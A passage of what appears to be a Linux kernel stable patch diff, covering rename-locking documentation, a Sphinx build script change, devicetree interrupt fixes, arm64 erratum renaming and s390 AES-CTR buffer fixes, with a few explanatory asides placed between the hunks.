+-parent and finds source and target.  We lock both (provided they exist).  If we
+-need to lock two inodes of different type (dir vs non-dir), we lock directory
+-first.  If we need to lock two inodes of the same type, lock them in inode
+-pointer order.  Then call the method.  All locks are exclusive.
+-NB: we might get away with locking the source (and target in exchange
+-case) shared.
++4) rename() that is _not_ cross-directory.  Locking rules: caller locks
++the parent and finds source and target.  Then we decide which of the
++source and target need to be locked.  Source needs to be locked if it's a
++non-directory; target - if it's a non-directory or about to be removed.
++Take the locks that need to be taken, in inode pointer order if we need
++to take both (that can happen only when both source and target are
++non-directories - the source because it wouldn't be locked otherwise
++and the target because mixing directory and non-directory is allowed
++only with RENAME_EXCHANGE, and that won't be removing the target).
++After the locks have been taken, call the method.  All locks are exclusive.
+ 
+ 5) link creation.  Locking rules:
+ 
+@@ -44,20 +47,17 @@ rules:
+ 
+ 	* lock the filesystem
+ 	* lock parents in "ancestors first" order. If one is not ancestor of
+-	  the other, lock them in inode pointer order.
++	  the other, lock the parent of source first.
+ 	* find source and target.
+ 	* if old parent is equal to or is a descendent of target
+ 	  fail with -ENOTEMPTY
+ 	* if new parent is equal to or is a descendent of source
+ 	  fail with -ELOOP
+-	* Lock both the source and the target provided they exist. If we
+-	  need to lock two inodes of different type (dir vs non-dir), we lock
+-	  the directory first. If we need to lock two inodes of the same type,
+-	  lock them in inode pointer order.
++	* Lock subdirectories involved (source before target).
++	* Lock non-directories involved, in inode pointer order.
+ 	* call the method.
+ 
+-All ->i_rwsem are taken exclusive.  Again, we might get away with locking
+-the source (and target in exchange case) shared.
++All ->i_rwsem are taken exclusive.
+ 
+ The rules above obviously guarantee that all directories that are going to be
+ read, modified or removed by method will be locked by caller.
+@@ -67,6 +67,7 @@ If no directory is its own ancestor, the scheme above is deadlock-free.
+ 
+ Proof:
+ 
++[XXX: will be updated once we are done massaging the lock_rename()]
+ 	First of all, at any moment we have a linear ordering of the
+ 	objects - A < B iff (A is an ancestor of B) or (B is not an ancestor
+         of A and ptr(A) < ptr(B)).
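
Rule 4 above condenses into short pseudo-code (illustrative only, not the VFS
implementation): work out which children actually need locking, then take only
those locks, falling back to inode pointer order when both are non-directories:

        lock(parent);
        source = lookup(parent, old_name);
        target = lookup(parent, new_name);
        lock_src = !is_dir(source);                 /* non-directory source */
        lock_tgt = target && (!is_dir(target) || doomed(target));
        if (lock_src && lock_tgt && source > target)
                swap(source, target);               /* both non-dirs: pointer order */
        if (lock_src)
                lock(source);
        if (lock_tgt)
                lock(target);
        /* ... call ->rename() ... */
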
+diff --git a/Documentation/filesystems/locking.rst b/Documentation/filesystems/locking.rst
+index 8f737e76935ce..555215c416d90 100644
+--- a/Documentation/filesystems/locking.rst
++++ b/Documentation/filesystems/locking.rst
+@@ -99,7 +99,7 @@ symlink:	exclusive
+ mkdir:		exclusive
+ unlink:		exclusive (both)
+ rmdir:		exclusive (both)(see below)
+-rename:		exclusive (all)	(see below)
++rename:		exclusive (both parents, some children)	(see below)
+ readlink:	no
+ get_link:	no
+ setattr:	exclusive
+@@ -119,6 +119,9 @@ fileattr_set:	exclusive
+ 	Additionally, ->rmdir(), ->unlink() and ->rename() have ->i_rwsem
+ 	exclusive on victim.
+ 	cross-directory ->rename() has (per-superblock) ->s_vfs_rename_sem.
++	->unlink() and ->rename() have ->i_rwsem exclusive on all non-directories
++	involved.
++	->rename() has ->i_rwsem exclusive on any subdirectory that changes parent.
+ 
+ See Documentation/filesystems/directory-locking.rst for more detailed discussion
+ of the locking scheme for directory operations.
+diff --git a/Documentation/filesystems/porting.rst b/Documentation/filesystems/porting.rst
+index df0dc37e6f582..c6aaf340f1792 100644
+--- a/Documentation/filesystems/porting.rst
++++ b/Documentation/filesystems/porting.rst
+@@ -943,3 +943,21 @@ file pointer instead of struct dentry pointer.  d_tmpfile() is similarly
+ changed to simplify callers.  The passed file is in a non-open state and on
+ success must be opened before returning (e.g. by calling
+ finish_open_simple()).
++
++---
++
++**mandatory**
++
++If ->rename() update of .. on cross-directory move needs an exclusion with
++directory modifications, do *not* lock the subdirectory in question in your
++->rename() - it's done by the caller now [that item should've been added in
++28eceeda130f "fs: Lock moved directories"].
++
++---
++
++**mandatory**
++
++On same-directory ->rename() the (tautological) update of .. is not protected
++by any locks; just don't do it if the old parent is the same as the new one.
++We really can't lock two subdirectories in same-directory rename - not without
++deadlocks.
+diff --git a/Documentation/sphinx/kernel_abi.py b/Documentation/sphinx/kernel_abi.py
+index b5feb5b1d9054..6d8a637ad5664 100644
+--- a/Documentation/sphinx/kernel_abi.py
++++ b/Documentation/sphinx/kernel_abi.py
+@@ -39,8 +39,6 @@ import sys
+ import re
+ import kernellog
+ 
+-from os import path
+-
+ from docutils import nodes, statemachine
+ from docutils.statemachine import ViewList
+ from docutils.parsers.rst import directives, Directive
+@@ -73,60 +71,26 @@ class KernelCmd(Directive):
+     }
+ 
+     def run(self):
+-
+         doc = self.state.document
+         if not doc.settings.file_insertion_enabled:
+             raise self.warning("docutils: file insertion disabled")
+ 
+-        env = doc.settings.env
+-        cwd = path.dirname(doc.current_source)
+-        cmd = "get_abi.pl rest --enable-lineno --dir "
+-        cmd += self.arguments[0]
+-
+-        if 'rst' in self.options:
+-            cmd += " --rst-source"
++        srctree = os.path.abspath(os.environ["srctree"])
+ 
+-        srctree = path.abspath(os.environ["srctree"])
++        args = [
++            os.path.join(srctree, 'scripts/get_abi.pl'),
++            'rest',
++            '--enable-lineno',
++            '--dir', os.path.join(srctree, 'Documentation', self.arguments[0]),
++        ]
+ 
+-        fname = cmd
+-
+-        # extend PATH with $(srctree)/scripts
+-        path_env = os.pathsep.join([
+-            srctree + os.sep + "scripts",
+-            os.environ["PATH"]
+-        ])
+-        shell_env = os.environ.copy()
+-        shell_env["PATH"]    = path_env
+-        shell_env["srctree"] = srctree
++        if 'rst' in self.options:
++            args.append('--rst-source')
+ 
+-        lines = self.runCmd(cmd, shell=True, cwd=cwd, env=shell_env)
++        lines = subprocess.check_output(args, cwd=os.path.dirname(doc.current_source)).decode('utf-8')
+         nodeList = self.nestedParse(lines, self.arguments[0])
+         return nodeList
+ 
+-    def runCmd(self, cmd, **kwargs):
+-        u"""Run command ``cmd`` and return its stdout as unicode."""
+-
+-        try:
+-            proc = subprocess.Popen(
+-                cmd
+-                , stdout = subprocess.PIPE
+-                , stderr = subprocess.PIPE
+-                , **kwargs
+-            )
+-            out, err = proc.communicate()
+-
+-            out, err = codecs.decode(out, 'utf-8'), codecs.decode(err, 'utf-8')
+-
+-            if proc.returncode != 0:
+-                raise self.severe(
+-                    u"command '%s' failed with return code %d"
+-                    % (cmd, proc.returncode)
+-                )
+-        except OSError as exc:
+-            raise self.severe(u"problems with '%s' directive: %s."
+-                              % (self.name, ErrorString(exc)))
+-        return out
+-
+     def nestedParse(self, lines, fname):
+         env = self.state.document.settings.env
+         content = ViewList()
+diff --git a/Makefile b/Makefile
+index 7cd49d9eadbfc..9dd167178ab4c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 75
++SUBLEVEL = 76
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/alpha/kernel/rtc.c b/arch/alpha/kernel/rtc.c
+index fb3025396ac96..cfdf90bc8b3f8 100644
+--- a/arch/alpha/kernel/rtc.c
++++ b/arch/alpha/kernel/rtc.c
+@@ -80,7 +80,7 @@ init_rtc_epoch(void)
+ static int
+ alpha_rtc_read_time(struct device *dev, struct rtc_time *tm)
+ {
+-	int ret = mc146818_get_time(tm);
++	int ret = mc146818_get_time(tm, 10);
+ 
+ 	if (ret < 0) {
+ 		dev_err_ratelimited(dev, "unable to read current time\n");
+diff --git a/arch/arm/boot/dts/exynos4210-i9100.dts b/arch/arm/boot/dts/exynos4210-i9100.dts
+index 53e023fc1cacf..b4c7b642e4562 100644
+--- a/arch/arm/boot/dts/exynos4210-i9100.dts
++++ b/arch/arm/boot/dts/exynos4210-i9100.dts
+@@ -521,6 +521,14 @@
+ 				regulator-name = "VT_CAM_1.8V";
+ 				regulator-min-microvolt = <1800000>;
+ 				regulator-max-microvolt = <1800000>;
++
++				/*
++				 * Force-enable this regulator; otherwise the
++				 * kernel hangs very early in the boot process
++				 * for about 12 seconds, without apparent
++				 * reason.
++				 */
++				regulator-always-on;
+ 			};
+ 
+ 			vcclcd_reg: LDO13 {
+diff --git a/arch/arm/boot/dts/qcom-sdx55.dtsi b/arch/arm/boot/dts/qcom-sdx55.dtsi
+index a4bf1d5ee2068..b85820448b9d5 100644
+--- a/arch/arm/boot/dts/qcom-sdx55.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx55.dtsi
+@@ -495,10 +495,10 @@
+ 					  <&gcc GCC_USB30_MASTER_CLK>;
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+-			interrupts = <GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 198 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 158 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 157 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 51 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 11 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc 10 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+@@ -522,7 +522,7 @@
+ 			compatible = "qcom,sdx55-pdc", "qcom,pdc";
+ 			reg = <0x0b210000 0x30000>;
+ 			qcom,pdc-ranges = <0 179 52>;
+-			#interrupt-cells = <3>;
++			#interrupt-cells = <2>;
+ 			interrupt-parent = <&intc>;
+ 			interrupt-controller;
+ 		};
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index ea70eb960565e..c15f71501c6c2 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -983,8 +983,12 @@ config ARM64_ERRATUM_2457168
+ 
+ 	  If unsure, say Y.
+ 
++config ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD
++	bool
++
+ config ARM64_ERRATUM_2966298
+ 	bool "Cortex-A520: 2966298: workaround for speculatively executed unprivileged load"
++	select ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+ 	default y
+ 	help
+ 	  This option adds the workaround for ARM Cortex-A520 erratum 2966298.
+diff --git a/arch/arm64/boot/dts/qcom/sc7180.dtsi b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+index 78e537f1d7965..13fe1c92bf351 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180.dtsi
+@@ -2769,8 +2769,8 @@
+ 
+ 			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&pdc 6 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&pdc 8 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&pdc 9 IRQ_TYPE_LEVEL_HIGH>;
++					      <&pdc 8 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc 9 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7280.dtsi b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+index 7fc8c20450223..04106d7254000 100644
+--- a/arch/arm64/boot/dts/qcom/sc7280.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7280.dtsi
+@@ -3664,9 +3664,9 @@
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+ 			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-					      <&pdc 14 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 14 IRQ_TYPE_EDGE_BOTH>,
+ 					      <&pdc 15 IRQ_TYPE_EDGE_BOTH>,
+-					      <&pdc 17 IRQ_TYPE_EDGE_BOTH>;
++					      <&pdc 17 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "hs_phy_irq",
+ 					  "dp_hs_phy_irq",
+ 					  "dm_hs_phy_irq",
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index 1e6841902900c..4d5905ef0b411 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -4048,10 +4048,10 @@
+ 					  <&gcc GCC_USB30_PRIM_MASTER_CLK>;
+ 			assigned-clock-rates = <19200000>, <150000000>;
+ 
+-			interrupts = <GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 488 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 489 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
++					      <&intc GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc_intc 8 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc_intc 9 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+@@ -4099,10 +4099,10 @@
+ 					  <&gcc GCC_USB30_SEC_MASTER_CLK>;
+ 			assigned-clock-rates = <19200000>, <150000000>;
+ 
+-			interrupts = <GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 490 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 491 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts-extended = <&intc GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
++					      <&intc GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc_intc 10 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc_intc 11 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index c3c12b0cd4168..8efd0e227d780 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -3628,10 +3628,10 @@
+ 					  <&gcc GCC_USB30_PRIM_MASTER_CLK>;
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+-			interrupts = <GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 488 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 489 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts-extended = <&intc GIC_SPI 131 IRQ_TYPE_LEVEL_HIGH>,
++					      <&intc GIC_SPI 486 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 8 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc 9 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+@@ -3677,10 +3677,10 @@
+ 					  <&gcc GCC_USB30_SEC_MASTER_CLK>;
+ 			assigned-clock-rates = <19200000>, <200000000>;
+ 
+-			interrupts = <GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 490 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 491 IRQ_TYPE_LEVEL_HIGH>;
++			interrupts-extended = <&intc GIC_SPI 136 IRQ_TYPE_LEVEL_HIGH>,
++					      <&intc GIC_SPI 487 IRQ_TYPE_LEVEL_HIGH>,
++					      <&pdc 10 IRQ_TYPE_EDGE_BOTH>,
++					      <&pdc 11 IRQ_TYPE_EDGE_BOTH>;
+ 			interrupt-names = "hs_phy_irq", "ss_phy_irq",
+ 					  "dm_hs_phy_irq", "dp_hs_phy_irq";
+ 
+diff --git a/arch/arm64/boot/install.sh b/arch/arm64/boot/install.sh
+index 7399d706967a4..9b7a09808a3dd 100755
+--- a/arch/arm64/boot/install.sh
++++ b/arch/arm64/boot/install.sh
+@@ -17,7 +17,8 @@
+ #   $3 - kernel map file
+ #   $4 - default install path (blank if root directory)
+ 
+-if [ "$(basename $2)" = "Image.gz" ]; then
++if [ "$(basename $2)" = "Image.gz" ] || [ "$(basename $2)" = "vmlinuz.efi" ]
++then
+ # Compressed install
+   echo "Installing compressed kernel"
+   base=vmlinuz
+diff --git a/arch/arm64/kernel/cpu_errata.c b/arch/arm64/kernel/cpu_errata.c
+index 3f917124684c5..61f22e9c92b4c 100644
+--- a/arch/arm64/kernel/cpu_errata.c
++++ b/arch/arm64/kernel/cpu_errata.c
+@@ -723,10 +723,10 @@ const struct arm64_cpu_capabilities arm64_errata[] = {
+ 		.cpu_enable = cpu_clear_bf16_from_user_emulation,
+ 	},
+ #endif
+-#ifdef CONFIG_ARM64_ERRATUM_2966298
++#ifdef CONFIG_ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+ 	{
+ 		.desc = "ARM erratum 2966298",
+-		.capability = ARM64_WORKAROUND_2966298,
++		.capability = ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD,
+ 		/* Cortex-A520 r0p0 - r0p1 */
+ 		ERRATA_MIDR_REV_RANGE(MIDR_CORTEX_A520, 0, 0, 1),
+ 	},
+diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S
+index de16fa917e1b8..62146d48dba73 100644
+--- a/arch/arm64/kernel/entry.S
++++ b/arch/arm64/kernel/entry.S
+@@ -419,7 +419,7 @@ alternative_else_nop_endif
+ 	ldp	x28, x29, [sp, #16 * 14]
+ 
+ 	.if	\el == 0
+-alternative_if ARM64_WORKAROUND_2966298
++alternative_if ARM64_WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+ 	tlbi	vale1, xzr
+ 	dsb	nsh
+ alternative_else_nop_endif
+diff --git a/arch/arm64/tools/cpucaps b/arch/arm64/tools/cpucaps
+index e73830d9f1367..2dc7ddee5f044 100644
+--- a/arch/arm64/tools/cpucaps
++++ b/arch/arm64/tools/cpucaps
+@@ -71,7 +71,6 @@ WORKAROUND_2064142
+ WORKAROUND_2077057
+ WORKAROUND_2457168
+ WORKAROUND_2658417
+-WORKAROUND_2966298
+ WORKAROUND_AMPERE_AC03_CPU_38
+ WORKAROUND_TRBE_OVERWRITE_FILL_MODE
+ WORKAROUND_TSB_FLUSH_FAILURE
+@@ -87,3 +86,4 @@ WORKAROUND_NVIDIA_CARMEL_CNP
+ WORKAROUND_QCOM_FALKOR_E1003
+ WORKAROUND_REPEAT_TLBI
+ WORKAROUND_SPECULATIVE_AT
++WORKAROUND_SPECULATIVE_UNPRIV_LOAD
+diff --git a/arch/loongarch/kernel/smp.c b/arch/loongarch/kernel/smp.c
+index 14508d429ffa3..434bfc1cd31a4 100644
+--- a/arch/loongarch/kernel/smp.c
++++ b/arch/loongarch/kernel/smp.c
+@@ -471,8 +471,9 @@ asmlinkage void start_secondary(void)
+ 	unsigned int cpu;
+ 
+ 	sync_counter();
+-	cpu = smp_processor_id();
++	cpu = raw_smp_processor_id();
+ 	set_my_cpu_offset(per_cpu_offset(cpu));
++	rcu_cpu_starting(cpu);
+ 
+ 	cpu_probe();
+ 	constant_clockevent_init();
+diff --git a/arch/mips/kernel/elf.c b/arch/mips/kernel/elf.c
+index 5582a4ca1e9e3..7aa2c2360ff60 100644
+--- a/arch/mips/kernel/elf.c
++++ b/arch/mips/kernel/elf.c
+@@ -11,6 +11,7 @@
+ 
+ #include <asm/cpu-features.h>
+ #include <asm/cpu-info.h>
++#include <asm/fpu.h>
+ 
+ #ifdef CONFIG_MIPS_FP_SUPPORT
+ 
+@@ -309,6 +310,11 @@ void mips_set_personality_nan(struct arch_elf_state *state)
+ 	struct cpuinfo_mips *c = &boot_cpu_data;
+ 	struct task_struct *t = current;
+ 
++	/* Do this early so t->thread.fpu.fcr31 won't be clobbered in case
++	 * we are preempted before the lose_fpu(0) in start_thread.
++	 */
++	lose_fpu(0);
++
+ 	t->thread.fpu.fcr31 = c->fpu_csr31;
+ 	switch (state->nan_2008) {
+ 	case 0:
+diff --git a/arch/mips/lantiq/prom.c b/arch/mips/lantiq/prom.c
+index be4829cc7a3a0..28da4e720d177 100644
+--- a/arch/mips/lantiq/prom.c
++++ b/arch/mips/lantiq/prom.c
+@@ -114,10 +114,9 @@ void __init prom_init(void)
+ 	prom_init_cmdline();
+ 
+ #if defined(CONFIG_MIPS_MT_SMP)
+-	if (cpu_has_mipsmt) {
+-		lantiq_smp_ops = vsmp_smp_ops;
++	lantiq_smp_ops = vsmp_smp_ops;
++	if (cpu_has_mipsmt)
+ 		lantiq_smp_ops.init_secondary = lantiq_init_secondary;
+-		register_smp_ops(&lantiq_smp_ops);
+-	}
++	register_smp_ops(&lantiq_smp_ops);
+ #endif
+ }
+diff --git a/arch/mips/mm/init.c b/arch/mips/mm/init.c
+index 5a8002839550e..e8660d06f663f 100644
+--- a/arch/mips/mm/init.c
++++ b/arch/mips/mm/init.c
+@@ -417,7 +417,12 @@ void __init paging_init(void)
+ 		       (highend_pfn - max_low_pfn) << (PAGE_SHIFT - 10));
+ 		max_zone_pfns[ZONE_HIGHMEM] = max_low_pfn;
+ 	}
++
++	max_mapnr = highend_pfn ? highend_pfn : max_low_pfn;
++#else
++	max_mapnr = max_low_pfn;
+ #endif
++	high_memory = (void *) __va(max_low_pfn << PAGE_SHIFT);
+ 
+ 	free_area_init(max_zone_pfns);
+ }
+@@ -453,13 +458,6 @@ void __init mem_init(void)
+ 	 */
+ 	BUILD_BUG_ON(IS_ENABLED(CONFIG_32BIT) && (_PFN_SHIFT > PAGE_SHIFT));
+ 
+-#ifdef CONFIG_HIGHMEM
+-	max_mapnr = highend_pfn ? highend_pfn : max_low_pfn;
+-#else
+-	max_mapnr = max_low_pfn;
+-#endif
+-	high_memory = (void *) __va(max_low_pfn << PAGE_SHIFT);
+-
+ 	maar_init();
+ 	memblock_free_all();
+ 	setup_zero_pages();	/* Setup zeroed pages.  */
+diff --git a/arch/parisc/kernel/firmware.c b/arch/parisc/kernel/firmware.c
+index 3e051a973e9b2..92276bcf19d77 100644
+--- a/arch/parisc/kernel/firmware.c
++++ b/arch/parisc/kernel/firmware.c
+@@ -123,10 +123,10 @@ static unsigned long f_extend(unsigned long address)
+ #ifdef CONFIG_64BIT
+ 	if(unlikely(parisc_narrow_firmware)) {
+ 		if((address & 0xff000000) == 0xf0000000)
+-			return 0xf0f0f0f000000000UL | (u32)address;
++			return (0xfffffff0UL << 32) | (u32)address;
+ 
+ 		if((address & 0xf0000000) == 0xf0000000)
+-			return 0xffffffff00000000UL | (u32)address;
++			return (0xffffffffUL << 32) | (u32)address;
+ 	}
+ #endif
+ 	return address;
+diff --git a/arch/powerpc/Kconfig b/arch/powerpc/Kconfig
+index 2c94f9cf1ce00..6050e6e10d321 100644
+--- a/arch/powerpc/Kconfig
++++ b/arch/powerpc/Kconfig
+@@ -806,7 +806,6 @@ config THREAD_SHIFT
+ 	int "Thread shift" if EXPERT
+ 	range 13 15
+ 	default "15" if PPC_256K_PAGES
+-	default "15" if PPC_PSERIES || PPC_POWERNV
+ 	default "14" if PPC64
+ 	default "13"
+ 	help
+diff --git a/arch/s390/crypto/aes_s390.c b/arch/s390/crypto/aes_s390.c
+index 526c3f40f6a26..7b66e81e5f876 100644
+--- a/arch/s390/crypto/aes_s390.c
++++ b/arch/s390/crypto/aes_s390.c
+@@ -601,7 +601,9 @@ static int ctr_aes_crypt(struct skcipher_request *req)
+ 	 * final block may be < AES_BLOCK_SIZE, copy only nbytes
+ 	 */
+ 	if (nbytes) {
+-		cpacf_kmctr(sctx->fc, sctx->key, buf, walk.src.virt.addr,
++		memset(buf, 0, AES_BLOCK_SIZE);
++		memcpy(buf, walk.src.virt.addr, nbytes);
++		cpacf_kmctr(sctx->fc, sctx->key, buf, buf,
+ 			    AES_BLOCK_SIZE, walk.iv);
+ 		memcpy(walk.dst.virt.addr, buf, nbytes);
+ 		crypto_inc(walk.iv, AES_BLOCK_SIZE);
+diff --git a/arch/s390/crypto/paes_s390.c b/arch/s390/crypto/paes_s390.c
+index 621322eb0e681..d84d87349718c 100644
+--- a/arch/s390/crypto/paes_s390.c
++++ b/arch/s390/crypto/paes_s390.c
+@@ -688,9 +688,11 @@ static int ctr_paes_crypt(struct skcipher_request *req)
+ 	 * final block may be < AES_BLOCK_SIZE, copy only nbytes
+ 	 */
+ 	if (nbytes) {
++		memset(buf, 0, AES_BLOCK_SIZE);
++		memcpy(buf, walk.src.virt.addr, nbytes);
+ 		while (1) {
+ 			if (cpacf_kmctr(ctx->fc, &param, buf,
+-					walk.src.virt.addr, AES_BLOCK_SIZE,
++					buf, AES_BLOCK_SIZE,
+ 					walk.iv) == AES_BLOCK_SIZE)
+ 				break;
+ 			if (__paes_convert_key(ctx))
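
Both s390 CTR fixes above share one bounce-buffer shape: the CPACF instruction
consumes full 16-byte blocks only, so handing it the final partial block
directly would make it read past the end of the source. A generic sketch,
where encrypt_one_block() merely stands in for the cpacf_kmctr() calls:

        u8 buf[AES_BLOCK_SIZE] = {};       /* zero-padded staging block */

        memcpy(buf, src, nbytes);          /* nbytes < AES_BLOCK_SIZE */
        encrypt_one_block(buf, buf);       /* engine sees a full block in and out */
        memcpy(dst, buf, nbytes);          /* copy back only the real tail */
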
+diff --git a/arch/x86/include/asm/syscall_wrapper.h b/arch/x86/include/asm/syscall_wrapper.h
+index fd2669b1cb2d9..e3323a9dc911b 100644
+--- a/arch/x86/include/asm/syscall_wrapper.h
++++ b/arch/x86/include/asm/syscall_wrapper.h
+@@ -58,12 +58,29 @@ extern long __ia32_sys_ni_syscall(const struct pt_regs *regs);
+ 		,,regs->di,,regs->si,,regs->dx				\
+ 		,,regs->r10,,regs->r8,,regs->r9)			\
+ 
++
++/* SYSCALL_PT_ARGS is adapted from s390x */
++#define SYSCALL_PT_ARG6(m, t1, t2, t3, t4, t5, t6)			\
++	SYSCALL_PT_ARG5(m, t1, t2, t3, t4, t5), m(t6, (regs->bp))
++#define SYSCALL_PT_ARG5(m, t1, t2, t3, t4, t5)				\
++	SYSCALL_PT_ARG4(m, t1, t2, t3, t4),  m(t5, (regs->di))
++#define SYSCALL_PT_ARG4(m, t1, t2, t3, t4)				\
++	SYSCALL_PT_ARG3(m, t1, t2, t3),  m(t4, (regs->si))
++#define SYSCALL_PT_ARG3(m, t1, t2, t3)					\
++	SYSCALL_PT_ARG2(m, t1, t2), m(t3, (regs->dx))
++#define SYSCALL_PT_ARG2(m, t1, t2)					\
++	SYSCALL_PT_ARG1(m, t1), m(t2, (regs->cx))
++#define SYSCALL_PT_ARG1(m, t1) m(t1, (regs->bx))
++#define SYSCALL_PT_ARGS(x, ...) SYSCALL_PT_ARG##x(__VA_ARGS__)
++
++#define __SC_COMPAT_CAST(t, a)						\
++	(__typeof(__builtin_choose_expr(__TYPE_IS_L(t), 0, 0U)))	\
++	(unsigned int)a
++
+ /* Mapping of registers to parameters for syscalls on i386 */
+ #define SC_IA32_REGS_TO_ARGS(x, ...)					\
+-	__MAP(x,__SC_ARGS						\
+-	      ,,(unsigned int)regs->bx,,(unsigned int)regs->cx		\
+-	      ,,(unsigned int)regs->dx,,(unsigned int)regs->si		\
+-	      ,,(unsigned int)regs->di,,(unsigned int)regs->bp)
++	SYSCALL_PT_ARGS(x, __SC_COMPAT_CAST,				\
++			__MAP(x, __SC_TYPE, __VA_ARGS__))		\
+ 
+ #define __SYS_STUB0(abi, name)						\
+ 	long __##abi##_##name(const struct pt_regs *regs);		\
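The rewritten SC_IA32_REGS_TO_ARGS stops casting every register to unsigned int wholesale; __SC_COMPAT_CAST uses __builtin_choose_expr to pick int or unsigned int depending on whether the parameter's declared type is long-sized (__TYPE_IS_L), so the truncated 32-bit value is then sign- or zero-extended as appropriate. A hedged illustration of why the distinction matters on an LP64 kernel:

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	/* A 32-bit task left 0xffffffff in a register; the kernel sees it
	 * in the low half of a 64-bit pt_regs slot. */
	uint64_t reg = 0xffffffffULL;

	/* Parameter declared as 'int': truncate, then sign-extend -> -1. */
	long as_int = (long)(int)(uint32_t)reg;

	/* Parameter that carries an address: must stay zero-extended. */
	unsigned long as_addr = (unsigned long)(uint32_t)reg;

	printf("int arg: %ld, address arg: %#lx\n", as_int, as_addr);
	return 0;
}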
+diff --git a/arch/x86/kernel/hpet.c b/arch/x86/kernel/hpet.c
+index 71f336425e58a..54732da52dc14 100644
+--- a/arch/x86/kernel/hpet.c
++++ b/arch/x86/kernel/hpet.c
+@@ -1436,7 +1436,7 @@ irqreturn_t hpet_rtc_interrupt(int irq, void *dev_id)
+ 	memset(&curr_time, 0, sizeof(struct rtc_time));
+ 
+ 	if (hpet_rtc_flags & (RTC_UIE | RTC_AIE)) {
